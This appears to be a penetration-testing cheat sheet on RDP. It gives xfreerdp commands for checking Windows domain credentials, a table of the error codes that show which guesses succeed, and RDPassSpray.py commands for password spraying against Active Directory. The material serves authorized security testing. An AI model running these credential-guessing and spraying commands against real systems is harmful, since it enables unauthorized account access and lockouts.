RDP
Use the RDP service to guess Windows related credentials. Especially usefull in an Active Directory environment.
Check Credentials
xfreerdp
xfreerdp /v:<TARGET> +auth-only /d:<DOMAIN> /u:<USER> /p:<PASSWORD> /sec:nla /cert-ignore 2>&1 | grep freerdp_set_last_error
Understand results:
| Output | Meaning |
|---|---|
| Good credentials, RDP access | |
ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] |
Good credentials, no RDP access |
ERRCONNECT_LOGON_FAILURE [0x00020014] |
Wrong credentials |
RDPassSpray.py
RDPassSpray.py -t <TARGET> -d <DOMAIN> -u <USER> -p <PASSWORD>
Source**: github.com/xFreed0m/RDPassSpray**
Note
Logs are written to $INSTALLDIR/RDPassSpray.<date>.log
Password Spray
RDPassSpray.py
RDPassSpray.py -t <TARGET> -d <DOMAIN> -U </path/to/user/file> -p <PASSWORD>
Source**: github.com/xFreed0m/RDPassSpray**
Note
Logs are written to $INSTALLDIR/RDPassSpray.<date>.log
References
- https://github.com/dafthack/RDPSpray
- https://www.blackhillsinfosec.com/podcast-rdp-logging-bypass-and-azure-active-directory-recon/